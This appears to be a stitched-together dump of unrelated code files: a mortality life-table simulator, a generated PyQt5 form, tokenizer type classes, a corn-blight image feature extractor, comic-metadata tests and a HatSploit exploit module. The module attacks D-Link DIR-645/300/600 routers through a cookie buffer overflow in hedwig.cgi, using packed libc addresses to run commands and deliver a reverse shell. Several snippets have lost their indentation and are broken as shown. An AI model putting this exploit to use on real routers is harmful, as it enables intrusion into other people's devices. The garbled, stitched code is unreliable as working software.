HULSTROM = 'mortality/hultstrom-lifetable.csv'

# The *actual* 2004 life table (I think).  The top-level index is at
# http://www.cdc.gov/nchs/products/life_tables.htm
NVSS_2004 = 'mortality/2004-life-table.csv'

# And an updated 2011 version.
NVSS_2011 = 'mortality/2011-life-table.csv'

# The Annuity 2000 table differs yet again (it yields even longer life spans
# than the 2004 table) because it applies a 10% "loading factor" to account
# for annuity buyers living longer than average.  It is probably the best
# table to use for most testing.  The source was randomly Googled.
ANNUITY_2000 = 'mortality/annuity-2000.csv'


def make_mortality(csv_filename):
    """Build a stochastic one-year survival function from a CSV life table.

    The table must provide "Male Death Probability" and "Female Death
    Probability" columns, with the row index corresponding to age in years.
    """
    table = pandas.read_csv(csv_filename)
    column_for = {
        MALE: "Male Death Probability",
        FEMALE: "Female Death Probability",
    }

    def survive(age, gender):
        """Return True if a person of this age/gender reaches the next birthday."""
        return random.random() > table.iloc[age][column_for[gender]]

    return survive
# Lightweight (age, gender) record used to describe one member of a household.
Person = collections.namedtuple("Person", "age gender")
def gen_lifespan(people, survival_fn=None):
    """Simulate how many whole years pass until everyone in *people* has died.

    *people* is a list of Person-like objects exposing ``.age`` and
    ``.gender``, which makes same-sex couples, different-age couples, and so
    on easy to model.  When *survival_fn* is not given, one is built from
    the Annuity 2000 life table.
    """
    if not survival_fn:
        survival_fn = make_mortality(ANNUITY_2000)

    year = 0
    alive = list(people)
    while alive:
        # Keep only those who survive their (age + year)-th year.
        alive = [p for p in alive if survival_fn(p.age + year, p.gender)]
        year += 1
    return year
# Canonical test households: a 65/63 mixed-gender couple and a single 65-year-old man.
DEFAULT_COUPLE = [Person(age=65, gender=MALE), Person(age=63, gender=FEMALE)]
SINGLE_MALE = [Person(age=65, gender=MALE)]
def make_mortality_rate(source=ANNUITY_2000):
    """Return a lookup function mapping (age, gender) to the one-year death
    probability read from *source*, a life-table CSV."""
    table = pandas.read_csv(source)
    column_for = {
        MALE: "Male Death Probability",
        FEMALE: "Female Death Probability",
    }

    def rate(age, gender):
        return table.iloc[age][column_for[gender]]

    return rate
def life_expectancy(male_age, female_age):
    """Expected remaining years of life, from the Annuity 2000 table.

    Pass an age for exactly one of *male_age* / *female_age* and ``None``
    for the other (single-life expectancy).  Supplying both raises
    NotImplementedError: joint life expectancy is not implemented.
    """
    table = pandas.read_csv(ANNUITY_2000)

    def survivors(gender, age):
        # Number of people from the table's cohort still alive at *age*.
        column = {
            MALE: "Male Lives",
            FEMALE: "Female Lives",
        }[gender]
        return table.iloc[age][column]

    def person_years(gender, age):
        # Total person-years lived beyond *age* by everyone alive at *age*.
        total = 0
        for offset in range(116 - age):
            total += survivors(gender, age + offset)
        return total

    if male_age and female_age:
        # Joint expectancy: simply blending the two populations is wrong,
        # and the aacalc approach looked too complex; there must be a
        # simpler solution.
        raise NotImplementedError
    elif male_age:
        return person_years(MALE, male_age) / survivors(MALE, male_age)
    else:
        return person_years(FEMALE, female_age) / survivors(FEMALE, female_age)
| StarcoderdataPython |
6644383 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'dockWindowa.ui'
#
# Created by: PyQt5 UI code generator 5.15.2
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(420, 666)
Form.setMinimumSize(QtCore.QSize(0, 0))
Form.setMaximumSize(QtCore.QSize(420, 16777215))
Form.setLayoutDirection(QtCore.Qt.RightToLeft)
Form.setStyleSheet("#Form{background-color:#4683ff ;}")
self.verticalLayout = QtWidgets.QVBoxLayout(Form)
self.verticalLayout.setContentsMargins(10, 10, 10, 10)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setObjectName("verticalLayout")
self.groupBox = QtWidgets.QGroupBox(Form)
self.groupBox.setStyleSheet("QGroupBox{background-color:#ffffff;border:none;border-radius:5px;}")
self.groupBox.setTitle("")
self.groupBox.setObjectName("groupBox")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.groupBox)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setSpacing(0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout.setSpacing(0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.groupBox_3 = QtWidgets.QGroupBox(self.groupBox)
self.groupBox_3.setMaximumSize(QtCore.QSize(150, 16777215))
self.groupBox_3.setStyleSheet("QGroupBox{border-radius:0px;background-color:#4683ff;}")
self.groupBox_3.setTitle("")
self.groupBox_3.setObjectName("groupBox_3")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.groupBox_3)
self.verticalLayout_4.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_4.setSpacing(0)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.groupBox_4 = QtWidgets.QGroupBox(self.groupBox_3)
self.groupBox_4.setStyleSheet("QGroupBox{background-color:#ffffff;border-top-left-radius:10px;border-top-right-radius:5px;}")
self.groupBox_4.setTitle("")
self.groupBox_4.setObjectName("groupBox_4")
self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.groupBox_4)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.label = QtWidgets.QLabel(self.groupBox_4)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.verticalLayout_5.addWidget(self.label)
self.verticalLayout_4.addWidget(self.groupBox_4)
self.horizontalLayout.addWidget(self.groupBox_3)
self.groupBox_2 = QtWidgets.QGroupBox(self.groupBox)
self.groupBox_2.setStyleSheet("QGroupBox{border-radius:0px;background-color:#4683ff;border-bottom-right-radius:15px;}")
self.groupBox_2.setTitle("")
self.groupBox_2.setObjectName("groupBox_2")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.groupBox_2)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.label_2 = QtWidgets.QLabel(self.groupBox_2)
self.label_2.setText("")
self.label_2.setObjectName("label_2")
self.verticalLayout_3.addWidget(self.label_2)
self.horizontalLayout.addWidget(self.groupBox_2)
self.verticalLayout_2.addLayout(self.horizontalLayout)
self.groupBox_35 = QtWidgets.QGroupBox(self.groupBox)
self.groupBox_35.setMinimumSize(QtCore.QSize(400, 0))
self.groupBox_35.setMaximumSize(QtCore.QSize(400, 16777215))
self.groupBox_35.setStyleSheet("QGroupBox{background-color:#ffffff;border:none;border-radius:5px;}\n"
"QListWidget {background-color: #ffffff;\n"
"outline: none;\n"
"border:0px;\n"
"border-radius:5px;\n"
"show-decoration-selected: 1}\n"
"QListWidget:item {background-color:#f6fafd;}\n"
"QListWidget::item:selected {background-color: transparent;}")
self.groupBox_35.setTitle("")
self.groupBox_35.setObjectName("groupBox_35")
self.formLayout = QtWidgets.QFormLayout(self.groupBox_35)
self.formLayout.setHorizontalSpacing(20)
self.formLayout.setVerticalSpacing(10)
self.formLayout.setObjectName("formLayout")
self.label2 = QtWidgets.QLabel(self.groupBox_35)
self.label2.setStyleSheet("QLabel{color:#4683ff;}")
self.label2.setObjectName("label2")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label2)
self.labeloth = QtWidgets.QLabel(self.groupBox_35)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.MinimumExpanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.labeloth.sizePolicy().hasHeightForWidth())
self.labeloth.setSizePolicy(sizePolicy)
self.labeloth.setMaximumSize(QtCore.QSize(16777215, 16777215))
font = QtGui.QFont()
font.setPointSize(10)
self.labeloth.setFont(font)
self.labeloth.setStyleSheet("QLabel{background-color:#f6fafd;}")
self.labeloth.setAlignment(QtCore.Qt.AlignCenter)
self.labeloth.setObjectName("labeloth")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.labeloth)
self.label7 = QtWidgets.QLabel(self.groupBox_35)
self.label7.setStyleSheet("QLabel{color:#4683ff;}")
self.label7.setObjectName("label7")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label7)
self.labelanemia = QtWidgets.QLabel(self.groupBox_35)
self.labelanemia.setMaximumSize(QtCore.QSize(16777215, 16777215))
font = QtGui.QFont()
font.setPointSize(10)
self.labelanemia.setFont(font)
self.labelanemia.setStyleSheet("QLabel{background-color:#f6fafd;}")
self.labelanemia.setAlignment(QtCore.Qt.AlignCenter)
self.labelanemia.setObjectName("labelanemia")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.labelanemia)
self.label3 = QtWidgets.QLabel(self.groupBox_35)
self.label3.setStyleSheet("QLabel{color:#4683ff;}")
self.label3.setObjectName("label3")
self.formLayout.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.label3)
self.label5 = QtWidgets.QLabel(self.groupBox_35)
self.label5.setStyleSheet("QLabel{color:#4683ff;}")
self.label5.setObjectName("label5")
self.formLayout.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.label5)
self.listarad = QtWidgets.QListWidget(self.groupBox_35)
self.listarad.setMinimumSize(QtCore.QSize(0, 200))
self.listarad.setMaximumSize(QtCore.QSize(16777215, 16777215))
font = QtGui.QFont()
font.setPointSize(10)
self.listarad.setFont(font)
self.listarad.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.listarad.setSelectionMode(QtWidgets.QAbstractItemView.NoSelection)
self.listarad.setObjectName("listarad")
self.formLayout.setWidget(6, QtWidgets.QFormLayout.FieldRole, self.listarad)
self.label6 = QtWidgets.QLabel(self.groupBox_35)
self.label6.setStyleSheet("QLabel{color:#4683ff;}")
self.label6.setObjectName("label6")
self.formLayout.setWidget(8, QtWidgets.QFormLayout.LabelRole, self.label6)
self.listdwaa = QtWidgets.QListWidget(self.groupBox_35)
self.listdwaa.setMinimumSize(QtCore.QSize(0, 200))
self.listdwaa.setMaximumSize(QtCore.QSize(16777215, 16777215))
font = QtGui.QFont()
font.setPointSize(10)
self.listdwaa.setFont(font)
self.listdwaa.setStyleSheet("QTableWidget::item:selected{color:#000000;background-color:#ffffff;}")
self.listdwaa.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.listdwaa.setSelectionMode(QtWidgets.QAbstractItemView.NoSelection)
self.listdwaa.setObjectName("listdwaa")
self.formLayout.setWidget(8, QtWidgets.QFormLayout.FieldRole, self.listdwaa)
self.line = QtWidgets.QFrame(self.groupBox_35)
self.line.setStyleSheet("QWidget{ border:0px;border-bottom:1px solid #d3e0ea;}")
self.line.setFrameShape(QtWidgets.QFrame.HLine)
self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line.setObjectName("line")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.line)
self.line_2 = QtWidgets.QFrame(self.groupBox_35)
self.line_2.setStyleSheet("QWidget{ border:0px;border-bottom:1px solid #d3e0ea;}")
self.line_2.setFrameShape(QtWidgets.QFrame.HLine)
self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_2.setObjectName("line_2")
self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.line_2)
self.line_3 = QtWidgets.QFrame(self.groupBox_35)
self.line_3.setStyleSheet("QWidget{ border:0px;border-bottom:1px solid #d3e0ea;}")
self.line_3.setFrameShape(QtWidgets.QFrame.HLine)
self.line_3.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_3.setObjectName("line_3")
self.formLayout.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.line_3)
self.line_4 = QtWidgets.QFrame(self.groupBox_35)
self.line_4.setStyleSheet("QWidget{ border:0px;border-bottom:1px solid #d3e0ea;}")
self.line_4.setFrameShape(QtWidgets.QFrame.HLine)
self.line_4.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_4.setObjectName("line_4")
self.formLayout.setWidget(7, QtWidgets.QFormLayout.FieldRole, self.line_4)
self.labelnotes = QtWidgets.QPlainTextEdit(self.groupBox_35)
self.labelnotes.setEnabled(False)
font = QtGui.QFont()
font.setPointSize(10)
self.labelnotes.setFont(font)
self.labelnotes.setLayoutDirection(QtCore.Qt.LeftToRight)
self.labelnotes.setStyleSheet("QPlainTextEdit{background-color:#f6fafd;border:0px;}")
self.labelnotes.setReadOnly(True)
self.labelnotes.setTextInteractionFlags(QtCore.Qt.TextSelectableByMouse)
self.labelnotes.setCenterOnScroll(False)
self.labelnotes.setObjectName("labelnotes")
self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.labelnotes)
self.verticalLayout_2.addWidget(self.groupBox_35)
self.verticalLayout.addWidget(self.groupBox)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
    """Apply the translatable UI strings to the widgets built in setupUi."""
    _translate = QtCore.QCoreApplication.translate
    Form.setWindowTitle(_translate("Form", "Form"))
    # One table of (widget, source text) pairs so every label is set the
    # same way; order matches the original generated code.
    for widget, text in (
        (self.label, "معلومات"),
        (self.label2, "أخرى"),
        (self.labeloth, "TextLabel"),
        (self.label7, "أنيميا"),
        (self.labelanemia, "TextLabel"),
        (self.label3, "ملاحظات"),
        (self.label5, "الأعراض"),
        (self.label6, "الدواء"),
    ):
        widget.setText(_translate("Form", text))
| StarcoderdataPython |
3334356 | from __future__ import absolute_import
class TokenType(object):
    """A single token category, optionally flagged as carrying syntax."""

    def __init__(self, name, contains_syntax=False):
        # Human-readable token-type name (e.g. "NAME", "OP").
        self.name = name
        # True when tokens of this type can be syntactically meaningful
        # (keywords, operators).
        self.contains_syntax = contains_syntax

    def __repr__(self):
        # e.g. TokenType(NAME)
        return '%s(%s)' % (type(self).__name__, self.name)
class TokenTypes(object):
    """
    Namespace of TokenType instances, one attribute per token name.
    Basically an enum, but Python 2 doesn't have enums in the standard library.
    """
    def __init__(self, names, contains_syntax):
        syntax_names = frozenset(contains_syntax)
        for token_name in names:
            token = TokenType(token_name,
                              contains_syntax=token_name in syntax_names)
            setattr(self, token_name, token)
# Token types produced by the Python tokenizer.  NAME and OP are the only
# categories whose string value can itself be syntax (keywords, operators),
# hence contains_syntax for those two.
PythonTokenTypes = TokenTypes((
    'STRING', 'NUMBER', 'NAME', 'ERRORTOKEN', 'NEWLINE', 'INDENT', 'DEDENT',
    'ERROR_DEDENT', 'FSTRING_STRING', 'FSTRING_START', 'FSTRING_END', 'OP',
    'ENDMARKER'),
    contains_syntax=('NAME', 'OP'),
)
| StarcoderdataPython |
28382 | <reponame>sadpotatoes/G6capstone-AI_Education<filename>app/ImagePreprocessing.py
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 8 11:20:09 2020
@author: Donovan
"""
class ImagePreprocessing:
    """@package ImagePreprocessing
    This class extracts a number of features from the images and saves them in a CSV
    to be used by the machine learning class.
    """
    # NOTE(review): these imports sit in the class body, so they become class
    # attributes rather than module globals, while the functions below refer
    # to them as bare names.  This suggests the code was originally
    # module-level and the indentation was mangled -- verify against upstream.
    import cv2
    #conda install -c conda-forge opencv=3.4.1
    #3-Clause BSD License
    import os
    import csv
    import numpy
    from skimage.io import imread, imshow
    import matplotlib.pyplot as plt
    from skimage.color import rgb2hsv
    #conda install -c anaconda scikit-image
    #BSD 3-Clause
def getAdvancedFeatures(imageIn):
    """
    Compute blight-related pixel statistics for one RGB image.

    Foreground (plant) pixels are isolated with HSV masks, then "blighted"
    (brown) pixels are counted in HSV space, in RGB space, and in the
    intersection of the two.

    Parameters
    ----------
    imageIn : ndarray
        RGB image array of shape (rows, cols, 3).

    Returns
    -------
    returnValues : tuple
        (numForegroundPixels, numBlightedHSVPixels, blightedHSVRatio,
         num_RGB_blightedPixels, blightedRGBRatio, numBlightedBothPixels,
         blightedBothRatio).
    """
    # Lower RGB thresholds for "brown" pixels.  The HSV constants below were
    # presumably hand-tuned on the corn dataset -- TODO confirm.  (The unused
    # high* upper bounds from the original were removed.)
    lowRed = 165
    lowGreen = 160
    lowBlue = 135
    rgb_img = imageIn
    hsv_img = rgb2hsv(rgb_img)
    hue_img = hsv_img[:, :, 0]
    sat_img = hsv_img[:, :, 1]
    value_img = hsv_img[:, :, 2]
    # saturation mask to isolate foreground
    satMask = (sat_img > .11) | (value_img > .3)
    # hue and value mask to remove additional brown from background
    mask = (hue_img > .14) | (value_img > .48)
    # healthy corn mask to remove healthy corn, leaving only blighted pixels
    nonBlightMask = hue_img < .14
    # get foreground
    rawForeground = np.zeros_like(rgb_img)
    rawForeground[mask] = rgb_img[mask]
    # reduce brown in background
    foreground = np.zeros_like(rgb_img)
    foreground[satMask] = rawForeground[satMask]
    # get blighted pixels from foreground
    blightedPixels = np.zeros_like(rgb_img)
    blightedPixels[nonBlightMask] = foreground[nonBlightMask]
    # combine the three channels into one "any channel non-zero" band
    blightedHSV = np.bitwise_or(blightedPixels[:, :, 0], blightedPixels[:, :, 1])
    blightedHSV = np.bitwise_or(blightedHSV, blightedPixels[:, :, 2])
    red = rgb_img[:, :, 0]
    green = rgb_img[:, :, 1]
    blue = rgb_img[:, :, 2]
    binary_red = lowRed < red
    binary_green = lowGreen < green
    binary_blue = lowBlue < blue
    # 'brown' pixels that clear every RGB threshold
    RGB_Blights = np.bitwise_and(binary_red, binary_green)
    RGB_Blights = np.bitwise_and(RGB_Blights, binary_blue)
    HSV_and_RGB = np.bitwise_and(RGB_Blights, blightedHSV)
    # summary counts
    numForegroundPixels = np.count_nonzero(foreground)
    numBlightedHSVPixels = np.count_nonzero(blightedHSV)
    num_RGB_blightedPixels = np.count_nonzero(RGB_Blights)
    numBlightedBothPixels = np.count_nonzero(HSV_and_RGB)
    if numForegroundPixels == 0:
        # Guard against ZeroDivisionError on an image with no detected
        # foreground (previously this crashed the extraction run).
        blightedHSVRatio = blightedRGBRatio = blightedBothRatio = 0.0
    else:
        blightedHSVRatio = numBlightedHSVPixels / numForegroundPixels
        blightedRGBRatio = num_RGB_blightedPixels / numForegroundPixels
        blightedBothRatio = numBlightedBothPixels / numForegroundPixels
    returnValues = (numForegroundPixels, numBlightedHSVPixels, blightedHSVRatio,
                    num_RGB_blightedPixels, blightedRGBRatio,
                    numBlightedBothPixels, blightedBothRatio)
    return returnValues
def avgGray(image):
    """Return the mean pixel intensity of a grayscale image."""
    # Flatten to 1-D so the mean runs over every pixel.
    flat = numpy.reshape(image, -1)
    return numpy.mean(flat)
def avgRed(image):
    """Return the mean of the red channel of an RGB image.

    Previously this sliced a hard-coded 4000x6000 window; using the full
    channel matches avgGray and works for any image size (identical result
    for images up to 4000x6000).
    """
    red = numpy.reshape(image[:, :, 0], -1)
    return numpy.mean(red)
def avgGreen(image):
    """Return the mean of the green channel of an RGB image.

    Previously this sliced a hard-coded 4000x6000 window; using the full
    channel matches avgGray and works for any image size (identical result
    for images up to 4000x6000).
    """
    green = numpy.reshape(image[:, :, 1], -1)
    return numpy.mean(green)
def avgBlue(image):
    """Return the mean of the blue channel of an RGB image.

    Previously this sliced a hard-coded 4000x6000 window; using the full
    channel matches avgGray and works for any image size (identical result
    for images up to 4000x6000).
    """
    blue = numpy.reshape(image[:, :, 2], -1)
    return numpy.mean(blue)
def numBrownRed(image):
    """Count pixels whose red value falls in the 'brown' band [180, 250].

    Uses the full red channel instead of the previous hard-coded 4000x6000
    crop (identical for images up to that size).
    """
    red = numpy.reshape(image[:, :, 0], -1)
    # One histogram bin over the range counts the in-band pixels.
    counts, _ = numpy.histogram(red, bins=1, range=(180, 250))
    return counts[0]
def numBrownGreen(image):
    """Count pixels whose green value falls in the 'brown' band [160, 200].

    Uses the full green channel instead of the previous hard-coded 4000x6000
    crop (identical for images up to that size).
    """
    green = numpy.reshape(image[:, :, 1], -1)
    counts, _ = numpy.histogram(green, bins=1, range=(160, 200))
    return counts[0]
def numBrownBlue(image):
    """Count pixels whose blue value falls in the 'brown' band [150, 240].

    Uses the full blue channel instead of the previous hard-coded 4000x6000
    crop (identical for images up to that size).
    """
    blue = numpy.reshape(image[:, :, 2], -1)
    counts, _ = numpy.histogram(blue, bins=1, range=(150, 240))
    return counts[0]
def FdHuMoments(image):
    """
    Extracts Hu moments feature from an image

    Parameters
    ----------
    image : imread
        The image used for feature extraction

    Returns
    -------
    Feature : Float Array
        The Hu moments in the image.

    Reference
    ---------
    https://gogul.dev/software/image-classification-python
    """
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    moments = cv2.moments(gray)
    return cv2.HuMoments(moments).flatten()
def FdHaralick(image):
    """
    Extracts Haralick texture feature from an image

    Parameters
    ----------
    image : imread
        The image used for feature extraction

    Returns
    -------
    Feature : Float Array
        The Haralick texture in the image.

    Reference
    ---------
    https://gogul.dev/software/image-classification-python
    """
    # mahotas: MIT License (imported lazily, as in the original).
    import mahotas
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    # Mean over the four GLCM directions yields the 13-element vector.
    return mahotas.features.haralick(gray).mean(axis=0)
def FdHistogram(image, mask=None, bins=8):
    """
    Extracts color histogram feature from an image

    Parameters
    ----------
    image : imread
        The image used for feature extraction

    Returns
    -------
    Feature : Float Array
        The color histogram in the image.

    Reference
    ---------
    https://gogul.dev/software/image-classification-python
    """
    # NOTE(review): the mask parameter is accepted but not forwarded to
    # calcHist (kept as in the original).
    hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
    hist = cv2.calcHist([hsv], [0, 1, 2], None, [bins, bins, bins],
                        [0, 256, 0, 256, 0, 256])
    cv2.normalize(hist, hist)
    return hist.flatten()
import numpy as np
def ImageProcessing(folder_name):
    """Extract features for every image under *folder_name* and write csvOut.csv.

    Expects ``blighted`` and ``healthy`` sub-directories; rows are labeled
    'B' or 'H' respectively.  Fixes vs. the original: *folder_name* was
    ignored (sub-directories were hard-coded under 'images/', which this
    call pattern reproduces exactly), and the CSV handle was never closed.
    """
    def allFilesInDir(dir_name, label):
        # Build one feature row per image found (recursively) under dir_name.
        csvOut = []
        counter = 0
        for root, dirs, files in os.walk(os.path.abspath(dir_name)):
            for file in files:
                image = imread(os.path.join(root, file), as_gray=True)
                # NOTE(review): plt.show() blocks on every image when run
                # interactively; kept for parity with original behavior.
                import matplotlib.pyplot as plt
                plt.imshow(image, cmap='gray', vmin=0, vmax=1)
                plt.show()
                gray_mean = avgGray(image)
                image = imread(os.path.join(root, file))
                red_mean = avgRed(image)
                green_mean = avgGreen(image)
                blue_mean = avgBlue(image)
                num_brown_red = numBrownRed(image)
                num_brown_green = numBrownGreen(image)
                num_brown_blue = numBrownBlue(image)
                advanced_features = getAdvancedFeatures(image)
                image = cv2.imread(os.path.join(root, file))
                fv_hu_moments = FdHuMoments(image)
                fv_haralick = FdHaralick(image)
                # fv_histrogram = FdHistogram(image)
                feature_vector = np.hstack([file, fv_hu_moments, fv_haralick, gray_mean, red_mean, green_mean, blue_mean,
                                            num_brown_red, num_brown_green, num_brown_blue, advanced_features[0],
                                            advanced_features[1], advanced_features[2], advanced_features[3],
                                            advanced_features[4], advanced_features[5], advanced_features[6], label])
                csvOut.append(feature_vector)
                counter += 1
                print(counter)
        return csvOut
    # Please update these column labels if you add features in order to help with feature selection.
    # NOTE(review): 'fvha7' appears twice; haralick yields 13 values, so one
    # label is mis-numbered -- left unchanged so downstream header-based
    # readers keep working, but worth fixing upstream.
    columnLabels = ('fileName','fvhu','fvhu2','fvhu3','fvhu4','fvhu5','fvhu6','fvhu7',
                    'fvha1','fvha2','fvha3','fvha4','fvha5','fvha6','fvha7','fvha7',
                    'fvha8','fvha9','fvha10','fvha11','fvha12',
                    'gray_mean', 'red_mean', 'green_mean', 'blue_mean', 'num_brown_red', 'num_brown_green',
                    'num_brown_blue', 'numForegroundPxls', 'blightedHSV_pxls', 'blightedHSV_ratio',
                    'numRGB_blightedPxls', 'blightedRGBRatio', 'RGB_and_HSV_blighted', 'RGB_and_HSV_both_ratio', 'label')
    blighted_features = allFilesInDir(os.path.join(folder_name, 'blighted'), 'B')
    healthy_features = allFilesInDir(os.path.join(folder_name, 'healthy'), 'H')
    # 'with' guarantees the CSV is flushed and closed even on error.
    with open('csvOut.csv', 'w', newline='') as csvfile:
        obj = csv.writer(csvfile)
        obj.writerow(columnLabels)
        obj.writerows(blighted_features)
        obj.writerows(healthy_features)
#Main
# Root folder expected to contain the 'blighted' and 'healthy' image
# sub-directories used by the feature extraction above.
folder_name = 'images/'
ImageProcessing(folder_name)
3301215 | <filename>hatsploit/modules/exploit/linux/dlink/hedwig_code_execution.py
#!/usr/bin/env python3
#
# This module requires HatSploit: https://hatsploit.netlify.app
# Current source: https://github.com/EntySec/HatSploit
#
import struct
from hatsploit.lib.module import Module
from hatsploit.utils.handler import Handler
from hatsploit.utils.http import HTTPClient
from hatsploit.utils.string import StringTools
class HatSploitModule(Module, Handler, StringTools, HTTPClient):
    # Metadata displayed by the HatSploit framework for this module.
    details = {
        'Name': "D-Link hedwig Remote Code Execution",
        'Module': "exploit/linux/dlink/hedwig_code_execution",
        'Authors': [
            '<NAME> (enty8080) - module developer',
            '<NAME> - vulnerability researcher'
        ],
        'Description': "Remote Code Execution in D-Link DIR-645 <= 1.03, DIR-300 <= 2.14, DIR-600.",
        'Platform': "linux",
        'Rank': "high"
    }
    # Default payload plus the architectures/platforms it may target.
    payload = {
        'Value': "linux/mipsle/shell_reverse_tcp",
        'Categories': None,
        'Architectures': [
            'mipsle',
            'mipsbe',
            'generic'
        ],
        'Platforms': [
            'linux',
            'unix'
        ],
        'Types': None
    }
    # User-settable options: target host and port.
    options = {
        'RHOST': {
            'Description': "Remote host.",
            'Value': None,
            'Type': "ip",
            'Required': True
        },
        'RPORT': {
            'Description': "Remote port.",
            'Value': 80,
            'Type': "port",
            'Required': True
        }
    }
def exploit(self, remote_host, remote_port, command):
    """Send *command* to the target via an oversized hedwig.cgi uid cookie.

    The padded cookie appears to overflow a buffer and redirect execution
    through the packed libc addresses below; the command's output (after
    the CGI's XML wrapper) is returned on success.
    """
    command = command.encode("utf-8")
    # Presumably the libc load address on the target and gadget/function
    # offsets into it -- TODO confirm against the specific firmware build.
    libcbase = 0x2aaf8000
    system = 0x000531FF
    calcsystem = 0x000158C8
    callsystem = 0x000159CC
    # 973 filler bytes, then little-endian 32-bit addresses interleaved
    # with more filler, finally the shell command itself.
    shellcode = self.random_string(973).encode("utf-8")
    shellcode += struct.pack("<I", libcbase + system)
    shellcode += self.random_string(16).encode("utf-8")
    shellcode += struct.pack("<I", libcbase + callsystem)
    shellcode += self.random_string(12).encode("utf-8")
    shellcode += struct.pack("<I", libcbase + calcsystem)
    shellcode += self.random_string(16).encode("utf-8")
    shellcode += command
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        # The payload travels in the uid cookie.
        "Cookie": b"uid=" + shellcode + b";"
    }
    data = {
        self.random_string(7): self.random_string(7)
    }
    response = self.http_request(
        method="POST",
        host=remote_host,
        port=remote_port,
        path='/hedwig.cgi',
        data=data,
        headers=headers
    )
    if response:
        # Command output follows the closing </hedwig> tag in the body.
        return response.text[response.text.find("</hedwig>") + len("</hedwig>"):].strip()
def check(self, remote_host, remote_port):
    """Return True when the target serves /hedwig.cgi with HTTP 200."""
    response = self.http_request(
        method="GET",
        host=remote_host,
        port=remote_port,
        path="/hedwig.cgi"
    )
    if response is not None and response.status_code == 200:
        return True
    self.print_error("Target is not vulnerable!")
    return False
def run(self):
    """Entry point: verify the target is vulnerable, then deliver the payload."""
    remote_host, remote_port = self.parse_options(self.options)
    self.print_process("Exploiting {}...".format(remote_host))
    if not self.check(remote_host, remote_port):
        return
    # Hand off to the framework handler, which stages the payload by
    # echoing chunks over the command-execution primitive.
    self.module_handler(
        host=remote_host,
        method="echo",
        concat="&&",
        linemax=5,
        sender=self.exploit,
        args=[remote_host, remote_port],
    )
| StarcoderdataPython |
3325633 | import comics_net.analyzer as analyzer
metadata_path = "./comics_net/resources/metadata.jsonl"
labels_path = "./comics_net/resources/fantastic_four/labels.txt"
def test_load_metadata():
    """Loaded metadata must not contain keys outside the documented set."""
    metadata = analyzer.load_metadata(metadata_path)
    expected_keys = {
        "cover_characters",
        "cover_colors",
        "cover_first line of dialogue or text",
        "cover_genre",
        "cover_inks",
        "cover_keywords",
        "cover_letters",
        "cover_pencils",
        "covers",
        "format_binding",
        "format_color",
        "format_dimensions",
        "format_paper_stock",
        "format_publishing_format",
        "indexer_notes",
        "indicia_frequency",
        "issue_brand",
        "issue_indicia_publisher",
        "issue_pages",
        "issue_price",
        "on_sale_date",
        "rating",
        "series_name",
        "synopsis",
        "title",
        "variant_covers",
    }
    # Equivalent to difference(expected_keys) == set(): keys form a subset.
    assert set(metadata.keys()) <= expected_keys
def test_get_issue_number_from_title():
    """'#12' in a title parses to the integer 12."""
    assert analyzer.get_issue_number_from_title("Superman #12") == 12
def test_match_brackets():
    """Bracketed spans are keyed by the bracketed text with start/end offsets."""
    assert analyzer.match_brackets("Batman [Bruce Wayne]") == {
        "[Bruce Wayne]": {"end": 20, "start": 7}
    }
    assert analyzer.match_brackets(
        "Batman [Bruce Wayne], Superman [Clark Kent]"
    ) == {
        "[Bruce Wayne]": {"end": 20, "start": 7},
        "[Clark Kent]": {"end": 44, "start": 32},
    }
def test_replace_semicolons_in_brackets():
    """Semicolons inside brackets become '/' so later splits don't break."""
    result = analyzer.replace_semicolons_in_brackets("Superman [Clark Kent; Kal-El]")
    assert result == "Superman [Clark Kent/ Kal-El]"
def test_look_behind():
    """Looking behind from past the end returns the final segment."""
    text = "Superman; Batman; Wonder Woman"
